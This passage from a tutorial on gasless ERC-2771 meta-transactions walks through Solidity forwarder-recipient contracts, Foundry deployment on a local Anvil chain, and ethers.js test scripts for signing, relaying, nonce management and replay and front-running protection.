     * 2. sub(calldatasize(), 20) - calculates position of last 20 bytes
     * 3. calldataload(pos) - loads 32 bytes starting at position
     * 4. shr(96, value) - shifts right 96 bits (12 bytes) to extract address
     *
     * Example: If calldata is 100 bytes total:
     * - Last 20 bytes (80-99) contain the address
     * - calldataload(80) loads bytes 80-111 (32 bytes)
     * - shr(96, ...) discards the extra 12 bytes, keeping only the address
     */
    function _msgSender() internal view returns (address sender) {
        // Check if call came from trusted forwarder
        if (msg.sender == trustedForwarder &amp;&amp; msg.data.length &gt;= 20) {
            // Extract original sender from last 20 bytes of calldata
            assembly {
                sender := shr(96, calldataload(sub(calldatasize(), 20)))
            }
        } else {
            // Standard call, use msg.sender
            sender = msg.sender;
        }
    }

    /**
     * @notice Deposit funds for a user
     * @dev Works with both direct calls and meta-transactions
     */
    function deposit() external payable {
        // Use _msgSender() instead of msg.sender for compatibility
        address user = _msgSender();
        balances[user] += msg.value;
    }

    /**
     * @notice Withdraw funds
     * @dev Only the original user can withdraw their balance
     */
    function withdraw(uint256 amount) external {
        address user = _msgSender();
        require(balances[user] &gt;= amount, &quot;Insufficient balance&quot;);

        balances[user] -= amount;
        // NOTE: .transfer forwards a fixed 2300 gas stipend; a low-level
        // call{value: amount}(&quot;&quot;) with a success check is often preferred
        payable(user).transfer(amount);
    }
}
```

This pattern is elegant but requires discipline. Every contract function that cares about the caller must use `_msgSender()` instead of `msg.sender`. Miss one, and you introduce a vulnerability where the forwarder address is treated as the user.

## Complete Testing Flow with Foundry

Let&apos;s build a complete end-to-end testing environment so you can see meta-transactions in action. We&apos;ll use Foundry for contract deployment and JavaScript for the client-side signing and relayer logic.

### Project Setup

First, create a new Foundry project:

```bash
# Create project directory
mkdir meta-transaction-demo
cd meta-transaction-demo

# Initialize Foundry project
forge init --no-commit

# Install OpenZeppelin contracts (v4.9.0 - contains MinimalForwarder)
# Note: v5.x removed MinimalForwarder in favor of ERC2771Forwarder
forge install OpenZeppelin/openzeppelin-contracts@v4.9.0 --no-git

# Initialize npm for JavaScript dependencies
npm init -y
npm install ethers@6
```

Update `foundry.toml` to configure remappings:

```toml
[profile.default]
src = &quot;src&quot;
out = &quot;out&quot;
libs = [&quot;lib&quot;]
remappings = [
    &quot;@openzeppelin/=lib/openzeppelin-contracts/&quot;
]

# See more config options https://github.com/foundry-rs/foundry/tree/master/crates/config
```

### Smart Contracts

Create the contracts in the `src/` directory:

**`src/MinimalForwarder.sol`**: (Use the complete implementation from the earlier section)

**`src/RecipientContract.sol`**:

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete RecipientContract Implementation&lt;/strong&gt;&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

/**
 * @title RecipientContract
 * @notice Example contract that supports meta-transactions via EIP-2771
 */
contract RecipientContract {
    address public immutable trustedForwarder;
    mapping(address =&gt; uint256) public balances;
    mapping(address =&gt; string) public messages;

    event Deposited(address indexed user, uint256 amount);
    event MessageSet(address indexed user, string message);

    constructor(address _forwarder) {
        trustedForwarder = _forwarder;
    }

    /**
     * @notice Extract the original sender from calldata
     * @dev Implements EIP-2771 pattern
     */
    function _msgSender() internal view returns (address sender) {
        if (msg.sender == trustedForwarder &amp;&amp; msg.data.length &gt;= 20) {
            assembly {
                sender := shr(96, calldataload(sub(calldatasize(), 20)))
            }
        } else {
            sender = msg.sender;
        }
    }

    /**
     * @notice Deposit funds - can be called via meta-transaction
     */
    function deposit() external payable {
        address user = _msgSender();
        balances[user] += msg.value;
        emit Deposited(user, msg.value);
    }

    /**
     * @notice Set a message - demonstrates gasless interaction
     */
    function setMessage(string calldata _message) external {
        address user = _msgSender();
        messages[user] = _message;
        emit MessageSet(user, _message);
    }

    /**
     * @notice Withdraw funds
     */
    function withdraw(uint256 amount) external {
        address user = _msgSender();
        require(balances[user] &gt;= amount, &quot;Insufficient balance&quot;);

        balances[user] -= amount;
        payable(user).transfer(amount);
    }

    /**
     * @notice Check if forwarder is trusted
     */
    function isTrustedForwarder(address forwarder) public view returns (bool) {
        return forwarder == trustedForwarder;
    }
}
```

&lt;/details&gt;

### Deployment Script

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete Deployment Script&lt;/strong&gt;&lt;/summary&gt;

Create `script/Deploy.s.sol`:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import &quot;forge-std/Script.sol&quot;;
import &quot;../src/MinimalForwarder.sol&quot;;
import &quot;../src/RecipientContract.sol&quot;;

contract DeployScript is Script {
    function run() external {
        // Get deployer private key from environment
        uint256 deployerPrivateKey = vm.envUint(&quot;PRIVATE_KEY&quot;);

        vm.startBroadcast(deployerPrivateKey);

        // Deploy MinimalForwarder
        MinimalForwarder forwarder = new MinimalForwarder();
        console.log(&quot;MinimalForwarder deployed at:&quot;, address(forwarder));

        // Deploy RecipientContract with forwarder address
        RecipientContract recipient = new RecipientContract(address(forwarder));
        console.log(&quot;RecipientContract deployed at:&quot;, address(recipient));

        vm.stopBroadcast();

        // Print addresses in JSON format for easy copying
        console.log(&quot;\n=== Deployment Complete ===&quot;);
        console.log(&quot;Copy the following to deployed-addresses.json:\n&quot;);
        console.log(&quot;{&quot;);
        console.log(&apos;  &quot;forwarder&quot;: &quot;%s&quot;,&apos;, address(forwarder));
        console.log(&apos;  &quot;recipient&quot;: &quot;%s&quot;&apos;, address(recipient));
        console.log(&quot;}&quot;);
    }
}
```

&lt;/details&gt;

### Complete End-to-End Test Script

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete End-to-End Test Script (test-meta-tx.js)&lt;/strong&gt;&lt;/summary&gt;

Create `test-meta-tx.js` in the project root:

```javascript
const { ethers } = require(&apos;ethers&apos;);
const fs = require(&apos;fs&apos;);

/**
 * Complete end-to-end meta-transaction demonstration
 *
 * Requirements:
 * - ethers.js v6.x (this code uses v6 API)
 * - Node.js v16+
 * - Foundry/Anvil for local blockchain
 *
 * Note: For ethers v5.x, adjust imports to use:
 *   const { ethers } = require(&apos;ethers&apos;);
 *   const provider = new ethers.providers.JsonRpcProvider(...)
 *
 * Flow: User signs → Relayer submits → Contract executes
 */
async function main() {
    console.log(&apos;=== Meta-Transaction End-to-End Test ===\n&apos;);

    // Connect to local Anvil instance
    const provider = new ethers.JsonRpcProvider(&apos;http://localhost:8545&apos;);

    // Get network info
    const network = await provider.getNetwork();
    const chainId = Number(network.chainId);
    console.log(&apos;Connected to network:&apos;, network.name);
    console.log(&apos;Chain ID:&apos;, chainId);

    // Load deployed contract addresses
    const addresses = JSON.parse(fs.readFileSync(&apos;deployed-addresses.json&apos;, &apos;utf8&apos;));
    console.log(&apos;\nContract Addresses:&apos;);
    console.log(&apos;Forwarder:&apos;, addresses.forwarder);
    console.log(&apos;Recipient:&apos;, addresses.recipient);

    // Setup wallets
    // In Anvil, these are pre-funded test accounts
    const userWallet = new ethers.Wallet(
        &apos;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&apos;, // Anvil account 0
        provider
    );
    const relayerWallet = new ethers.Wallet(
        &apos;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&apos;, // Anvil account 1
        provider
    );

    console.log(&apos;\nWallets:&apos;);
    console.log(&apos;User:&apos;, userWallet.address);
    console.log(&apos;Relayer:&apos;, relayerWallet.address);

    // Load contract ABIs
    const forwarderArtifact = JSON.parse(
        fs.readFileSync(&apos;out/MinimalForwarder.sol/MinimalForwarder.json&apos;, &apos;utf8&apos;)
    );
    const recipientArtifact = JSON.parse(
        fs.readFileSync(&apos;out/RecipientContract.sol/RecipientContract.json&apos;, &apos;utf8&apos;)
    );

    // Create contract instances
    const forwarder = new ethers.Contract(
        addresses.forwarder,
        forwarderArtifact.abi,
        provider
    );
    const recipient = new ethers.Contract(
        addresses.recipient,
        recipientArtifact.abi,
        provider
    );

    // === STEP 1: User signs meta-transaction (off-chain, free) ===
    console.log(&apos;\n=== STEP 1: User Signs Meta-Transaction (Off-Chain) ===&apos;);

    // Get current nonce for user
    const nonce = await forwarder.getNonce(userWallet.address);
    console.log(&apos;Current nonce:&apos;, nonce.toString());

    // Encode the function call we want to execute
    const recipientInterface = new ethers.Interface(recipientArtifact.abi);
    const functionData = recipientInterface.encodeFunctionData(&apos;setMessage&apos;, [
        &apos;Hello from meta-transaction!&apos;
    ]);

    // Build ForwardRequest
    const request = {
        from: userWallet.address,
        to: addresses.recipient,
        value: 0,
        gas: 500000,
        nonce: Number(nonce),
        data: functionData
    };

    // EIP-712 domain
    const domain = {
        name: &apos;MinimalForwarder&apos;,
        version: &apos;0.0.1&apos;,
        chainId: chainId,
        verifyingContract: addresses.forwarder
    };

    // EIP-712 types
    const types = {
        ForwardRequest: [
            { name: &apos;from&apos;, type: &apos;address&apos; },
            { name: &apos;to&apos;, type: &apos;address&apos; },
            { name: &apos;value&apos;, type: &apos;uint256&apos; },
            { name: &apos;gas&apos;, type: &apos;uint256&apos; },
            { name: &apos;nonce&apos;, type: &apos;uint256&apos; },
            { name: &apos;data&apos;, type: &apos;bytes&apos; }
        ]
    };

    // User signs the typed data
    const signature = await userWallet.signTypedData(domain, types, request);

    console.log(&apos;User signed meta-transaction:&apos;);
    console.log(&apos;  Function: setMessage(&quot;Hello from meta-transaction!&quot;)&apos;);
    console.log(&apos;  Signature:&apos;, signature);
    console.log(&apos;  Gas required: 0 ETH (off-chain signature)&apos;);

    // === STEP 2: Verify signature (off-chain validation) ===
    console.log(&apos;\n=== STEP 2: Relayer Verifies Signature (Off-Chain) ===&apos;);

    const isValid = await forwarder.verify(request, signature);
    console.log(&apos;Signature valid:&apos;, isValid);

    if (!isValid) {
        console.error(&apos;ERROR: Signature verification failed!&apos;);
        process.exit(1);
    }

    // === STEP 3: Relayer submits transaction (on-chain, pays gas) ===
    console.log(&apos;\n=== STEP 3: Relayer Submits Transaction (On-Chain) ===&apos;);

    // Check relayer balance before
    const relayerBalanceBefore = await provider.getBalance(relayerWallet.address);
    console.log(&apos;Relayer balance before:&apos;, ethers.formatEther(relayerBalanceBefore), &apos;ETH&apos;);

    // Relayer submits the transaction
    const forwarderWithRelayer = forwarder.connect(relayerWallet);
    const tx = await forwarderWithRelayer.execute(request, signature, {
        gasLimit: 600000 // Request gas + overhead
    });

    console.log(&apos;Transaction submitted by relayer&apos;);
    console.log(&apos;  TX hash:&apos;, tx.hash);
    console.log(&apos;  Waiting for confirmation...&apos;);

    const receipt = await tx.wait();
    console.log(&apos;  ✓ Transaction confirmed!&apos;);
    console.log(&apos;  Block:&apos;, receipt.blockNumber);
    console.log(&apos;  Gas used:&apos;, receipt.gasUsed.toString());

    // Check relayer balance after (they paid the gas)
    const relayerBalanceAfter = await provider.getBalance(relayerWallet.address);
    const gasCost = relayerBalanceBefore - relayerBalanceAfter;
    console.log(&apos;Relayer balance after:&apos;, ethers.formatEther(relayerBalanceAfter), &apos;ETH&apos;);
    console.log(&apos;Gas cost paid by relayer:&apos;, ethers.formatEther(gasCost), &apos;ETH&apos;);

    // === STEP 4: Verify execution ===
    console.log(&apos;\n=== STEP 4: Verify Contract State ===&apos;);

    const storedMessage = await recipient.messages(userWallet.address);
    console.log(&apos;Message stored for user:&apos;, storedMessage);
    console.log(&apos;Expected message: &quot;Hello from meta-transaction!&quot;&apos;);
    console.log(&apos;Match:&apos;, storedMessage === &apos;Hello from meta-transaction!&apos; ? &apos;✓ YES&apos; : &apos;✗ NO&apos;);

    // Check nonce was incremented
    const newNonce = await forwarder.getNonce(userWallet.address);
    console.log(&apos;\nNonce before:&apos;, nonce.toString());
    console.log(&apos;Nonce after:&apos;, newNonce.toString());
    console.log(&apos;Incremented:&apos;, newNonce &gt; nonce ? &apos;✓ YES&apos; : &apos;✗ NO&apos;);

    // === STEP 5: Test replay protection ===
    console.log(&apos;\n=== STEP 5: Test Replay Protection ===&apos;);
    console.log(&apos;Attempting to replay the same signature...&apos;);

    try {
        const replayTx = await forwarderWithRelayer.execute(request, signature);
        await replayTx.wait();
        console.log(&apos;✗ VULNERABILITY: Replay succeeded! (This should not happen)&apos;);
    } catch (error) {
        console.log(&apos;✓ Replay prevented:&apos;, error.message.includes(&apos;signature invalid&apos;) ?
            &apos;Invalid signature (nonce mismatch)&apos; : error.message);
    }

    console.log(&apos;\n=== Test Complete ===&apos;);
    console.log(&apos;\nSummary:&apos;);
    console.log(&apos;  • User signed message off-chain (no gas cost)&apos;);
    console.log(&apos;  • Relayer submitted transaction (paid gas)&apos;);
    console.log(&apos;  • Contract executed as if user called directly&apos;);
    console.log(&apos;  • Nonce incremented to prevent replay&apos;);
    console.log(&apos;  • User never needed ETH for gas!&apos;);
}

main()
    .then(() =&gt; process.exit(0))
    .catch((error) =&gt; {
        console.error(error);
        process.exit(1);
    });
```

&lt;/details&gt;

### Step-by-Step Execution

Follow these steps to test the complete meta-transaction flow:

**1. Start local Anvil node** (Foundry&apos;s local Ethereum node):

```bash
# Start Anvil in a separate terminal
anvil
```

This starts a local blockchain at `http://localhost:8545` with pre-funded test accounts.

**2. Deploy contracts**:

```bash
# Set deployer private key (Anvil account 0)
export PRIVATE_KEY=0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80

# Deploy contracts to local Anvil
forge script script/Deploy.s.sol --rpc-url http://localhost:8545 --broadcast

# Alternatively, define an alias under [rpc_endpoints] in foundry.toml
# (e.g. localhost = &quot;http://localhost:8545&quot;) and use it as a shorthand:
forge script script/Deploy.s.sol --rpc-url localhost --broadcast
```

You should see output like:

```
MinimalForwarder deployed at: 0x5FbDB2315678afecb367f032d93F642f64180aa3
RecipientContract deployed at: 0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512

=== Deployment Complete ===
Copy the following to deployed-addresses.json:

{
  &quot;forwarder&quot;: &quot;0x5FbDB2315678afecb367f032d93F642f64180aa3&quot;,
  &quot;recipient&quot;: &quot;0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512&quot;
}
```

**Create `deployed-addresses.json`** with the addresses from the output:

```bash
# Create the file with your deployed addresses
cat &gt; deployed-addresses.json &lt;&lt; &apos;EOF&apos;
{
  &quot;forwarder&quot;: &quot;0x5FbDB2315678afecb367f032d93F642f64180aa3&quot;,
  &quot;recipient&quot;: &quot;0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512&quot;
}
EOF
```

Replace the addresses with the actual ones from your deployment output.

**3. Build contract artifacts** (required for JavaScript to load ABIs):

```bash
forge build
```

**4. Run the end-to-end test**:

```bash
node test-meta-tx.js
```

You should see output showing each step of the meta-transaction flow:

```
=== Meta-Transaction End-to-End Test ===

Connected to network: unknown
Chain ID: 31337

Contract Addresses:
Forwarder: 0x5FbDB2315678afecb367f032d93F642f64180aa3
Recipient: 0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512

Wallets:
User: 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266
Relayer: 0x70997970C51812dc3A010C7d01b50e0d17dc79C8

=== STEP 1: User Signs Meta-Transaction (Off-Chain) ===
Current nonce: 0
User signed meta-transaction:
  Function: setMessage(&quot;Hello from meta-transaction!&quot;)
  Signature: 0xfe316f9bc4b72934c2e62c86998b8c93941d38992e38a7d5be45ab9ca102cce23bb271ac848b69223cb821a427cd51aeb00ff1a9821892cbff32d8f77b1b8b591b
  Gas required: 0 ETH (off-chain signature)

=== STEP 2: Relayer Verifies Signature (Off-Chain) ===
Signature valid: true

=== STEP 3: Relayer Submits Transaction (On-Chain) ===
Relayer balance before: 10000.0 ETH
Transaction submitted by relayer
  TX hash: 0xbcaaa64bb45073eb51d82efb395ef8d639b04c24f42daa306d308efecb8658fe
  Waiting for confirmation...
  ✓ Transaction confirmed!
  Block: 3
  Gas used: 87140
Relayer balance after: 10000.0 ETH
Gas cost paid by relayer: 0.0 ETH
```

&gt; *Note*: Anvil uses gas-price=0 by default for easier local testing. The relayer still submitted the transaction (you can see 87,140 gas was used); on production networks this would cost real ETH (~$2-5 depending on gas prices).

```
=== STEP 4: Verify Contract State ===
Message stored for user: Hello from meta-transaction!
Expected message: &quot;Hello from meta-transaction!&quot;
Match: ✓ YES

Nonce before: 0
Nonce after: 1
Incremented: ✓ YES

=== STEP 5: Test Replay Protection ===
Attempting to replay the same signature...
✓ Replay prevented: Invalid signature (nonce mismatch)

=== Test Complete ===

Summary:
  • User signed message off-chain (no gas cost)
  • Relayer submitted transaction (paid gas)
  • Contract executed as if user called directly
  • Nonce incremented to prevent replay
  • User never needed ETH for gas!
```

### Understanding the Flow

Let&apos;s break down what just happened.

**Off-Chain (Free)**:
1. User creates a `ForwardRequest` with the function they want to call
2. User signs the request using EIP-712 typed data signing
3. No blockchain interaction, no gas fees, no ETH required

**Relayer Validation**:
4. Relayer receives the signed request
5. Relayer calls `forwarder.verify()` to check signature validity (view function, no gas)
6. Relayer decides whether to submit (could check rate limits, whitelists, etc.)

**On-Chain (Relayer Pays)**:
7. Relayer calls `forwarder.execute(request, signature)` and pays gas (87,140 gas units)
8. Forwarder verifies signature again (on-chain this time)
9. Forwarder increments user&apos;s nonce (prevents replay)
10. Forwarder forwards call to recipient contract with user&apos;s address appended

&gt; *Note*: In Anvil, gas-price=0 so cost shows as 0 ETH. In production (mainnet/testnets), this would cost real ETH.

**Contract Execution**:
11. Recipient contract receives call from forwarder
12. `_msgSender()` extracts original user address from calldata
13. Function executes as if user called it directly
14. State updates (message stored) are attributed to user, not relayer

**Security Verification**:
15. Nonce incremented, preventing replay attacks
16. Attempting to replay same signature fails with &quot;signature invalid&quot;

This demonstrates the complete meta-transaction pattern. User signs off-chain. Relayer pays gas. Contract executes as user.

### Testing Different Scenarios

You can create additional test scripts to explore different meta-transaction scenarios. Here are complete, ready-to-run examples.

**Feel free to skip these if you want**; they&apos;re here for completeness. The one scenario worth understanding is the front-running attack, which demonstrates a real security risk in meta-transaction systems.

#### Scenario 1: Test Deposit Function

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete Deposit Test Script (test-deposit.js)&lt;/strong&gt;&lt;/summary&gt;

Create `test-deposit.js`:

```javascript
const { ethers } = require(&apos;ethers&apos;);
const fs = require(&apos;fs&apos;);

async function main() {
    console.log(&apos;=== Testing Deposit via Meta-Transaction ===\n&apos;);

    const provider = new ethers.JsonRpcProvider(&apos;http://localhost:8545&apos;);
    const addresses = JSON.parse(fs.readFileSync(&apos;deployed-addresses.json&apos;, &apos;utf8&apos;));

    // Setup wallets
    const userWallet = new ethers.Wallet(
        &apos;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&apos;,
        provider
    );
    const relayerWallet = new ethers.Wallet(
        &apos;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&apos;,
        provider
    );

    // Load contracts
    const forwarderArtifact = JSON.parse(
        fs.readFileSync(&apos;out/MinimalForwarder.sol/MinimalForwarder.json&apos;, &apos;utf8&apos;)
    );
    const recipientArtifact = JSON.parse(
        fs.readFileSync(&apos;out/RecipientContract.sol/RecipientContract.json&apos;, &apos;utf8&apos;)
    );

    const forwarder = new ethers.Contract(addresses.forwarder, forwarderArtifact.abi, provider);
    const recipient = new ethers.Contract(addresses.recipient, recipientArtifact.abi, provider);

    // Build deposit request
    const nonce = await forwarder.getNonce(userWallet.address);
    const network = await provider.getNetwork();
    const chainId = Number(network.chainId);

    const recipientInterface = new ethers.Interface(recipientArtifact.abi);
    const functionData = recipientInterface.encodeFunctionData(&apos;deposit&apos;);

    const request = {
        from: userWallet.address,
        to: addresses.recipient,
        value: ethers.parseEther(&apos;0.1&apos;), // Deposit 0.1 ETH
        gas: 500000,
        nonce: Number(nonce),
        data: functionData
    };

    const domain = {
        name: &apos;MinimalForwarder&apos;,
        version: &apos;0.0.1&apos;,
        chainId: chainId,
        verifyingContract: addresses.forwarder
    };

    const types = {
        ForwardRequest: [
            { name: &apos;from&apos;, type: &apos;address&apos; },
            { name: &apos;to&apos;, type: &apos;address&apos; },
            { name: &apos;value&apos;, type: &apos;uint256&apos; },
            { name: &apos;gas&apos;, type: &apos;uint256&apos; },
            { name: &apos;nonce&apos;, type: &apos;uint256&apos; },
            { name: &apos;data&apos;, type: &apos;bytes&apos; }
        ]
    };

    console.log(&apos;User signs deposit of 0.1 ETH...&apos;);
    const signature = await userWallet.signTypedData(domain, types, request);

    console.log(&apos;Relayer submits transaction with value...&apos;);
    const forwarderWithRelayer = forwarder.connect(relayerWallet);
    const tx = await forwarderWithRelayer.execute(request, signature, {
        gasLimit: 600000,
        // NOTE: in this demo the relayer fronts the 0.1 ETH deposit value,
        // which the forwarder passes on as req.value. A production relayer
        // would not pay user deposits out of its own pocket.
        value: ethers.parseEther(&apos;0.1&apos;)
    });

    await tx.wait();
    console.log(&apos;✓ Transaction confirmed!&apos;);

    // Check user&apos;s balance in contract
    const balance = await recipient.balances(userWallet.address);
    console.log(&apos;\nUser balance in contract:&apos;, ethers.formatEther(balance), &apos;ETH&apos;);
    console.log(&apos;Expected: 0.1 ETH&apos;);
    console.log(&apos;Match:&apos;, balance === ethers.parseEther(&apos;0.1&apos;) ? &apos;✓ YES&apos; : &apos;✗ NO&apos;);
}

main()
    .then(() =&gt; process.exit(0))
    .catch((error) =&gt; {
        console.error(error);
        process.exit(1);
    });
```

&lt;/details&gt;

#### Scenario 2: Test Multiple Sequential Transactions

This scenario demonstrates an important edge case. Rapid sequential meta-transactions expose a nonce management issue with ethers.js.

**The Two-Nonce Problem**: Meta-transaction systems actually deal with **two different nonces**:

1. **Contract nonce** (in `MinimalForwarder`): Prevents replay attacks on meta-transactions. Managed per-user by the forwarder contract.
2. **Relayer account nonce** (Ethereum protocol): Orders the relayer&apos;s on-chain transactions. Managed per-account by the Ethereum network.

When you submit multiple meta-transactions rapidly in the same script, the relayer&apos;s account nonce that ethers.js picks up can be stale: the node may not yet reflect the previous pending transaction when the next one is built, causing &quot;nonce too low&quot; errors on the second transaction.

**The Solution**: Manually manage the relayer&apos;s account nonce outside of ethers.js&apos;s automatic management. Fetch it once at the start, then increment it manually for each transaction.

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete Sequential Transactions Test (test-sequential.js)&lt;/strong&gt;&lt;/summary&gt;

Create `test-sequential.js`:

```javascript
const { ethers } = require(&apos;ethers&apos;);
const fs = require(&apos;fs&apos;);

async function main() {
    console.log(&apos;=== Testing Multiple Sequential Meta-Transactions ===\n&apos;);

    const provider = new ethers.JsonRpcProvider(&apos;http://localhost:8545&apos;);
    const addresses = JSON.parse(fs.readFileSync(&apos;deployed-addresses.json&apos;, &apos;utf8&apos;));

    const userWallet = new ethers.Wallet(
        &apos;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&apos;,
        provider
    );
    const relayerWallet = new ethers.Wallet(
        &apos;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&apos;,
        provider
    );

    const forwarderArtifact = JSON.parse(
        fs.readFileSync(&apos;out/MinimalForwarder.sol/MinimalForwarder.json&apos;, &apos;utf8&apos;)
    );
    const recipientArtifact = JSON.parse(
        fs.readFileSync(&apos;out/RecipientContract.sol/RecipientContract.json&apos;, &apos;utf8&apos;)
    );

    const forwarder = new ethers.Contract(addresses.forwarder, forwarderArtifact.abi, provider);
    const recipient = new ethers.Contract(addresses.recipient, recipientArtifact.abi, provider);
    const recipientInterface = new ethers.Interface(recipientArtifact.abi);

    const network = await provider.getNetwork();
    const chainId = Number(network.chainId);

    const domain = {
        name: &apos;MinimalForwarder&apos;,
        version: &apos;0.0.1&apos;,
        chainId: chainId,
        verifyingContract: addresses.forwarder
    };

    const types = {
        ForwardRequest: [
            { name: &apos;from&apos;, type: &apos;address&apos; },
            { name: &apos;to&apos;, type: &apos;address&apos; },
            { name: &apos;value&apos;, type: &apos;uint256&apos; },
            { name: &apos;gas&apos;, type: &apos;uint256&apos; },
            { name: &apos;nonce&apos;, type: &apos;uint256&apos; },
            { name: &apos;data&apos;, type: &apos;bytes&apos; }
        ]
    };

    const forwarderWithRelayer = forwarder.connect(relayerWallet);

    // Send 3 sequential messages
    const messages = [&apos;Message 1&apos;, &apos;Message 2&apos;, &apos;Message 3&apos;];

    // SECURITY: Get initial relayer nonce once and manage it manually
    // This prevents ethers.js nonce caching issues in rapid sequential transactions
    let relayerNonce = await provider.getTransactionCount(relayerWallet.address, &apos;latest&apos;);

    for (let i = 0; i &lt; messages.length; i++) {
        console.log(`\n--- Transaction ${i + 1}/3 ---`);

        // Get current contract nonce (increases each iteration)
        const nonce = await forwarder.getNonce(userWallet.address);
        console.log(&apos;Current contract nonce:&apos;, nonce.toString());
        console.log(&apos;Current relayer nonce:&apos;, relayerNonce);

        // Build request
        const functionData = recipientInterface.encodeFunctionData(&apos;setMessage&apos;, [messages[i]]);
        const request = {
            from: userWallet.address,
            to: addresses.recipient,
            value: 0,
            gas: 500000,
            nonce: Number(nonce),
            data: functionData
        };

        // User signs
        const signature = await userWallet.signTypedData(domain, types, request);
        console.log(&apos;User signed:&apos;, messages[i]);

        // Relayer submits with manually managed nonce
        const tx = await forwarderWithRelayer.execute(request, signature, {
            gasLimit: 600000,
            nonce: relayerNonce  // Use manually tracked nonce
        });

        // Wait for confirmation
        await tx.wait();
        console.log(&apos;✓ Transaction confirmed&apos;);

        // Increment nonce for next iteration
        relayerNonce++;
    }

    // Verify final message
    const finalMessage = await recipient.messages(userWallet.address);
    console.log(&apos;\n=== Results ===&apos;);
    console.log(&apos;Final message:&apos;, finalMessage);
    console.log(&apos;Expected: &quot;Message 3&quot;&apos;);
    console.log(&apos;Match:&apos;, finalMessage === &apos;Message 3&apos; ? &apos;✓ YES&apos; : &apos;✗ NO&apos;);
}

main()
    .then(() =&gt; process.exit(0))
    .catch((error) =&gt; {
        console.error(error);
        process.exit(1);
    });
```

**Key Implementation Details:**

```javascript
// Fetch relayer&apos;s account nonce once
let relayerNonce = await provider.getTransactionCount(relayerWallet.address, &apos;latest&apos;);

// Use it explicitly in each transaction
const tx = await forwarderWithRelayer.execute(request, signature, {
    gasLimit: 600000,
    nonce: relayerNonce  // Manual control
});

await tx.wait();
relayerNonce++;  // Manual increment
```

This pattern is necessary when:
- Submitting multiple transactions from the same relayer rapidly
- Building batch transaction systems
- Testing meta-transaction flows programmatically

In production relayer services, this is typically handled by a transaction queue that manages nonces across concurrent requests.

&lt;/details&gt;

#### Scenario 3: Test Front-Running Protection

This test demonstrates an important security property. **ERC-2771 protects against identity-based front-running**. The relayer can control transaction ordering but cannot impersonate the user.

**What This Test Shows:**

The malicious relayer attempts to:
1. Intercept the user&apos;s signed meta-transaction
2. Send their own message first to &quot;claim&quot; the action
3. Then (maybe) submit the user&apos;s transaction

**Expected Result:** The user&apos;s message should still be correctly attributed to them, not affected by the relayer&apos;s front-running attempt. This is because `_msgSender()` correctly extracts the original user&apos;s address from the meta-transaction calldata, ensuring the relayer writes to `messages[relayerAddress]` while the user writes to `messages[userAddress]`. Completely separate storage slots.

&lt;details&gt;
&lt;summary&gt;&lt;strong&gt;Click to expand: Complete Front-Running Test (test-front-running.js)&lt;/strong&gt;&lt;/summary&gt;

Create `test-front-running.js`:

```javascript
const { ethers } = require(&apos;ethers&apos;);
const fs = require(&apos;fs&apos;);

async function main() {
    console.log(&apos;=== Testing Front-Running Protection ===\n&apos;);

    const provider = new ethers.JsonRpcProvider(&apos;http://localhost:8545&apos;);
    const addresses = JSON.parse(fs.readFileSync(&apos;deployed-addresses.json&apos;, &apos;utf8&apos;));

    const userWallet = new ethers.Wallet(
        &apos;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&apos;,
        provider
    );
    const relayerWallet = new ethers.Wallet(
        &apos;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&apos;,
        provider
    );

    const forwarderArtifact = JSON.parse(
        fs.readFileSync(&apos;out/MinimalForwarder.sol/MinimalForwarder.json&apos;, &apos;utf8&apos;)
    );
    const recipientArtifact = JSON.parse(
        fs.readFileSync(&apos;out/RecipientContract.sol/RecipientContract.json&apos;, &apos;utf8&apos;)
    );

    const forwarder = new ethers.Contract(addresses.forwarder, forwarderArtifact.abi, provider);
    const recipient = new ethers.Contract(addresses.recipient, recipientArtifact.abi, provider);
    const recipientInterface = new ethers.Interface(recipientArtifact.abi);

    const network = await provider.getNetwork();
    const chainId = Number(network.chainId);

    // User wants to set their message
    const userMessage = &apos;User message - this is mine!&apos;;
    console.log(&apos;User wants to set:&apos;, userMessage);

    // Build and sign meta-transaction
    const nonce = await forwarder.getNonce(userWallet.address);
    const functionData = recipientInterface.encodeFunctionData(&apos;setMessage&apos;, [userMessage]);

    const request = {
        from: userWallet.address,
        to: addresses.recipient,
        value: 0,
        gas: 500000,
        nonce: Number(nonce),
        data: functionData
    };

    const domain = {
        name: &apos;MinimalForwarder&apos;,
        version: &apos;0.0.1&apos;,
        chainId: chainId,
        verifyingContract: addresses.forwarder
    };

    const types = {
        ForwardRequest: [
            { name: &apos;from&apos;, type: &apos;address&apos; },
            { name: &apos;to&apos;, type: &apos;address&apos; },
            { name: &apos;value&apos;, type: &apos;uint256&apos; },
            { name: &apos;gas&apos;, type: &apos;uint256&apos; },
            { name: &apos;nonce&apos;, type: &apos;uint256&apos; },
            { name: &apos;data&apos;, type: &apos;bytes&apos; }
        ]
    };

    const signature = await userWallet.signTypedData(domain, types, request);
    console.log(&apos;✓ User signed meta-transaction\n&apos;);

    // SECURITY: Get initial relayer nonce for manual management
    // This script sends 2 transactions from relayer (front-run attempt + meta-tx)
